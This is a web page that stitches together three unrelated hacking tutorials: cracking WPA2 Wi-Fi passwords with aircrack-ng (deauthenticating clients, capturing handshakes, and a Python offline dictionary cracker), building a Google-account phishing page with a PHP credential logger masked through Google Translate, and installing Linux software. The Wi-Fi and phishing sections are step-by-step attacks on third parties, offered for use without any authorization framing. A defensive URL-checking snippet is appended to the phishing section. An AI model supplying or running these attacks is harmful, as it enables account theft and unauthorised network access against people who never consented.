How to Hack Wi-Fi: Cracking WPA2-PSK Passwords Using Aircrack-Ng

The weakness in WPA2-PSK is not that the password itself is transmitted; it is that the 4-way handshake, exchanged whenever a client joins the access point (AP), carries everything an eavesdropper needs to test password guesses offline. The pre-shared key is stretched into a pairwise master key (PMK); the PMK, the two nonces and the two MAC addresses from the handshake yield the pairwise transient key (PTK); and the first 16 bytes of the PTK are used to compute the message integrity code (MIC) on the handshake frames. Anyone who captures a complete handshake can recompute that MIC for candidate passwords and compare it with the captured one; a match reveals the PSK.
In this tutorial from our Wi-Fi Hacking series, we'll use aircrack-ng to run a dictionary attack against a 4-way handshake we capture. If you're looking for a faster way, also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:
  • airmon-ng start wlan0
Note that airmon-ng on BackTrack 5 creates a monitor interface named mon0 alongside wlan0. Newer releases of the suite name it wlan0mon instead, so substitute whatever interface name airmon-ng reports in the commands below.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
  • airodump-ng mon0
Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter
As you can see in the screenshot above, we're now focusing on capturing data from one AP with an ESSID of Belkin276 on channel 6. Belkin276 is probably a default SSID, and default SSIDs are prime targets: users who leave the default name usually haven't spent much effort securing the AP either.

Step 4: Aireplay-Ng Deauth

In order to capture the handshake, we need a client to authenticate to the AP while we're listening. A deauth only helps if at least one client is currently connected (check the lower part of the airodump-ng screen). If a client is already authenticated, we can de-authenticate it (kick it off); its system will automatically re-authenticate, and we capture the handshake in the process. Let's open another terminal and type:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authentication frames to send (0 means keep sending until stopped)
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP; when they re-authenticate, airodump-ng records the new 4-way handshake in the capture file. Let's go back to our airodump-ng terminal and check whether we've been successful.
Notice in the top line, to the far right, airodump-ng says "WPA handshake" followed by the BSSID. That is how it tells us the handshake has been captured, and it is the first step to success. If it doesn't appear, make sure a client was actually connected when you sent the deauth and that airodump-ng is still locked to the AP's channel.

Step 6: Let's Aircrack-Ng That Password!

Now that we have the handshake in our capture file, we can run that file through aircrack-ng with a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the darkc0de wordlist that ships with BackTrack.
We'll now attempt to crack the password by opening another terminal and typing:
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the capture file airodump-ng wrote (it appends -01 to the prefix we gave it)
  • /pentest/passwords/wordlists/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. Every candidate has to be stretched through 4096 rounds of PBKDF2-HMAC-SHA1 before its MIC can even be checked, which is what makes WPA2-PSK cracking so expensive. On my dual-core 2.8 GHz Intel processor, aircrack-ng tests a little over 500 passwords per second, which works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first, and if it's not successful, move on to a larger, more complete wordlist.
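The derivation that makes this attack possible, worked through in code. This is an added example in Python, not the tutorial's own material or the aircrack-ng project's code: it builds a constructed WPA2 handshake for the tutorial's SSID (Belkin276) and BSSID (08:86:30:74:22:76) with a hypothetical client MAC, fixed stand-in nonces and a hypothetical passphrase, then recovers the passphrase the way aircrack-ng does, by recomputing the MIC for each wordlist candidate. The EAPOL frame and the wordlist are constructed stand-ins for a real capture and for darkc0de.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# --- WPA2-PSK key derivation as specified in IEEE 802.11i ---

def pmk_from_psk(psk: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", psk.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(MACs)||max(MACs)||min(nonces)||max(nonces))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16], where KCK is
    the first 16 bytes of the PTK and the frame has its own MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(ssid: str, ap_mac: bytes, client_mac: bytes, anonce: bytes,
                    snonce: bytes, eapol_frame: bytes, captured_mic: bytes,
                    wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the MIC per candidate and compare."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA passphrases are 8-63 characters; skip the rest
            continue
        pmk = pmk_from_psk(candidate, ssid)
        kck = ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


# --- constructed "capture": what airodump-ng would have written for this tutorial's AP ---

def build_eapol_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    frame = bytearray()
    frame += b"\x01\x03\x00\x5f"      # EAPOL: version 1, type Key, body length 95
    frame += b"\x02"                  # descriptor type: RSN (WPA2)
    frame += b"\x01\x0a"              # key info: MIC set, pairwise, descriptor version 2
    frame += b"\x00\x10"              # key length 16
    frame += b"\x00" * 7 + b"\x01"    # replay counter 1
    frame += snonce                   # 32-byte SNonce
    frame += b"\x00" * 16             # key IV
    frame += b"\x00" * 8              # key RSC
    frame += b"\x00" * 8              # key ID
    frame += b"\x00" * 16             # MIC field, zeroed for the calculation
    frame += b"\x00\x00"              # key data length 0
    return bytes(frame)


SSID = "Belkin276"                               # ESSID from the tutorial
AP_MAC = bytes.fromhex("088630742276")           # BSSID from the tutorial
CLIENT_MAC = bytes.fromhex("001122334455")       # hypothetical client MAC
ANONCE = bytes(range(32))                        # fixed stand-ins for the random nonces
SNONCE = bytes(range(32, 64))
TRUE_PSK = "password123"                         # hypothetical passphrase the victim AP uses
EAPOL_MSG2 = build_eapol_msg2(SNONCE)
# The MIC the real client would have sent in message 2; this is all the capture gives us.
CAPTURED_MIC = eapol_mic(
    ptk_from_pmk(pmk_from_psk(TRUE_PSK, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16],
    EAPOL_MSG2,
)
WORDLIST = ["letmein", "Belkin276", "qwerty", "password123", "hunter2"]  # constructed stand-in for darkc0de


def demo() -> Optional[str]:
    return crack_handshake(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE,
                           EAPOL_MSG2, CAPTURED_MIC, WORDLIST)


if __name__ == "__main__":
    print("Recovered PSK:", demo())
```

The length filter is the same pruning aircrack-ng applies. The cost per candidate is dominated by the 4096 PBKDF2 rounds, which is why a few hundred guesses per second is typical for a CPU of that era and why the attack lives or dies by the wordlist.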

Social Engineering: Hack Google Accounts with a Google Translator Exploit

Google is our friend, but it still has its flaws, as everything does. A little-known quirk in the media giant's translation service lets a phishing page for Google accounts be served from a Google domain, which sidesteps the reputation-based protections in users' browsers as well as other protections Google has put in place. How? The address the victim sees reads as if it comes from Google itself.
It also plays on human psychology, because the domain appears to be a trusted one that you visit regularly. This kind of phishing lets an attacker collect credentials in plain text, and victims are unlikely to notice anything wrong.

Requirements

  • A webhosting account
  • Cpanel access to the webhost

Step 1 Create a Gmail Phishing Page

First, we need to make a phishing page to prepare.
  1. Open up a text document using notepad, or your choice in text editors.
  2. Go to the Google login page.
  3. Right-click somewhere on the page, and click View page source.
  4. Copy all of the contents of the source code and paste them into your text document.
  5. Press Ctrl+F and search for "action=". Change the form's method attribute to "GET" and replace the URL after "action=" with "log.php".
  6. Click File > Save as and save it with the name "index.php" (make sure to pick "all files" in the file-type drop-down if it isn't selected already).
  7. Make a new text file and paste the code below as its contents. This is the PHP script that logs the victim's login details. Because the form now submits with GET, the credentials travel in the query string, so they will also show up in the web server's access log and in the victim's browser history.
    <?php
    // Append every query-string parameter (the form fields, since the login
    // form's method was changed to GET) to passwords.txt, one name=value per line.
    $handle = fopen("passwords.txt", "a");
    if ($handle === false) {
        exit;  // cannot open the log; fail silently so the victim sees nothing
    }
    foreach ($_GET as $variable => $value) {
        fwrite($handle, $variable . "=" . $value . "\r\n");
    }
    fwrite($handle, "\r\n");  // blank line separates one submission from the next
    fclose($handle);
    exit;
    ?>
  8. Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
  9. Log in to your hosting account, and upload both files to the root of your website (not in a folder).
  10. When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Once you have some logs, check the box next to "passwords.txt" and click chmod. Set the permissions to 600 (read and write for the owner only) so other users on the shared host can't read the victims' passwords; this works when PHP runs as your own account user, which is the usual cPanel setup. A mode such as 466 does the opposite: it leaves the file readable and writable by everyone.

Step 2 Manipulating Google

How exactly does the manipulation work? Google Translate. Google Translate fetches any web page you give it and serves the translated copy from its own domain, so if an attacker creates a fake Gmail login page and translates it with the tool, they get a perfectly crafted link masked by Google itself.
This fools users into thinking the page is legitimate, because the address they see is Google's:
  1. Go to Google Translate.
  2. Enter the URL of your page and translate it from a different language into English.
  3. Click the resulting link and test.
See how frighteningly easy it is to lend a phishing page the appearance of a site as large as Google? Keep safe by always analyzing the URL: with a translated page, the site actually being shown is the one named inside the Google Translate link, not Google.
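A check for the advice above, as an added example that is not part of the original article. It assumes Google Translate serves proxied pages from translate.google.com or translate.googleusercontent.com and names the page being translated in its u= query parameter; the host lists and the sample URLs (attacker.example is a placeholder) are constructed for the example.

```python
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Hosts from which Google Translate serves a proxied copy of someone else's page.
# Assumed list for this example; extend it with whatever your own proxy logs show.
TRANSLATE_PROXY_HOSTS = {"translate.google.com", "translate.googleusercontent.com"}

# Hosts on which a genuine Google sign-in form lives (assumed minimal list).
GOOGLE_LOGIN_HOSTS = {"accounts.google.com"}


def real_origin(url: str) -> Optional[str]:
    """Host of the page actually rendered in the browser.

    For a Google Translate proxy URL that is the host named in the u= query
    parameter (the page being translated); for anything else it is the URL's
    own host. Returns None when no host can be determined.
    """
    parsed = urlparse(url)
    if not parsed.hostname:
        return None
    host = parsed.hostname.lower()
    if host not in TRANSLATE_PROXY_HOSTS:
        return host
    target = parse_qs(parsed.query).get("u", [""])[0]
    inner = urlparse(target)
    return inner.hostname.lower() if inner.hostname else None


def translate_masked_login(url: str) -> bool:
    """True when a Google address bar is masking a non-Google page.

    Meant to be applied to the URL of a page that asks for Google credentials:
    a genuine sign-in page sits on a Google login host, and a translated copy
    of some other site is never where a Google password should be typed.
    """
    host = (urlparse(url).hostname or "").lower()
    origin = real_origin(url)
    return (host in TRANSLATE_PROXY_HOSTS
            and origin is not None
            and origin not in GOOGLE_LOGIN_HOSTS)


# Constructed sample URLs for the demonstration.
SAMPLE_URLS = [
    "https://accounts.google.com/ServiceLogin?continue=https://mail.google.com/",
    "https://translate.google.com/translate?sl=fr&tl=en&u=http://attacker.example/index.php",
    "http://attacker.example/index.php",
]


def report(urls=SAMPLE_URLS) -> dict:
    """Map each URL to (host actually rendered, masked-login verdict)."""
    return {u: (real_origin(u), translate_masked_login(u)) for u in urls}


if __name__ == "__main__":
    for url, (origin, masked) in report().items():
        shown = urlparse(url).hostname
        print(f"{'MASKED' if masked else 'ok    '} shows={shown} really={origin} {url}")
```

The third sample is not flagged because nothing is masked: the user sees attacker.example in the address bar, which is exactly the cue the translation trick takes away.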

Basic Linux Guide and Tutorial - Chapter 6 (Installing New Software)

Step 1: GUI Package Manager

The simplest way to install software on BackTrack is to use the GUI package manager. In my KDE-based BackTrack 5, the GUI package manager is called KPackageKit (some of you may have Synaptic).
These package managers enable us to find packages, download them, and install them on our system. We can open KPackageKit by navigating to System and then KPackageKit as shown in the screenshot below.
When it opens, simply type a name into the search field. It will then list all the packages matching your search; click the icon next to the package you want to download.
In this example, we will be looking for the wireless hacking software aircrack-ng.
Note that if the package is already installed, there will be an X next to it. If not, there will be a downward-pointing arrow. Click on the arrow and then click the APPLY button below.

Step 2: Updating Your Repositories

Package managers search specified repositories (servers housing packages) for the package you are seeking. If you get a message that the package was not found, it doesn't necessarily mean that it doesn't exist, only that it's not in the repositories your OS is configured to search.
BackTrack defaults to the backtrack-linux.org repositories, where many hacking tools are available. If you are looking for something that is not a hacking tool, or a new hacking tool that BackTrack hasn't yet placed in its repository, you may have to change where your operating system searches for packages.
This is done by editing the /etc/apt/sources.list file. Let's open it with KWrite and take a look.
As you can see, BackTrack has three default sources in its sources.list, all pointing to BackTrack repositories. We can add any repository carrying Debian-style packages to this list, but since BackTrack is built on Ubuntu, the natural addition is an Ubuntu repository so we can install Ubuntu software. We do this by adding a single line to the file (every entry has the form deb <url> <release> <components>, and the release must match the Ubuntu release BackTrack is built on, or mismatched libraries can break the system), then running apt-get update so the package lists are refreshed.
Note that apt does not try the repositories in order: it merges the package lists from all configured sources and installs the highest-priority version of a package wherever it lives, so the new Ubuntu source simply makes more packages available to the package manager.

Step 3: Command Line Package Management

Ubuntu also has a command line package manager, apt, driven with the apt-get command. The basic syntax for installing a package is:
  • apt-get install aircrack-ng
So, let's open a terminal and type the above command to install aircrack-ng (to install other software, just replace the package name). Run apt-get update first if you have changed sources.list or haven't refreshed the package lists in a while.
If the package is in one of our repositories, apt downloads it and any necessary dependencies (other packages the program needs to run properly) and installs them on the system automatically.

Step 4: Installing from Source

Finally, sometimes you will need to download software that is neither in a repository nor packaged. Most often it is distributed as a tar archive or tarball: a set of files "tarred" together into a single file and usually compressed (similar to zipping files with WinZip).
Let's say that aircrack-ng was not in our repository (some software never finds its way into one) and we had to download it from the aircrack-ng.org website. We could download the file aircrack-ng-1.2-beta1.tar. Before building anything fetched from a website, compare the archive against the checksum or signature the project publishes: the steps that follow run the downloaded code with your privileges, and make install usually runs as root.
Once we've downloaded it, we need to untar it using the tar command:
  • tar xvf aircrack-ng-1.2-beta1.tar
This unpacks the archive (and decompresses it if it is compressed). Next we need to compile it. Compiling from source can give us binaries (the program files) tuned for our hardware and operating system, and it is the only route when no package exists. There is no universal compile command: running gcc on a single file name only works for tiny one-file programs, and a real tool such as aircrack-ng has many source files, so projects ship a build recipe. Read the README or INSTALL file in the extracted directory; if the tree contains a configure script, run ./configure, then make, then make install. aircrack-ng 1.2 ships a plain Makefile, so inside its directory we just type:
  • make
followed by make install as root if we want the binaries on the system path.
Finally, we can run the freshly built file from where make left it, which for aircrack-ng 1.2 is the src subdirectory of the tree we unpacked:
  • ./aircrack-ng
Note that to run the file we preceded it with ./, which tells the shell to execute the file in the current directory rather than search the PATH, so make certain you run this command in the directory that contains the compiled binary.
That should cover all the major ways of installing software and I hope it wasn't too confusing. In most cases, we can simply use the GUI based package manager to install software, but like all things in life, there are exceptions.
Copyright © techiepedia ®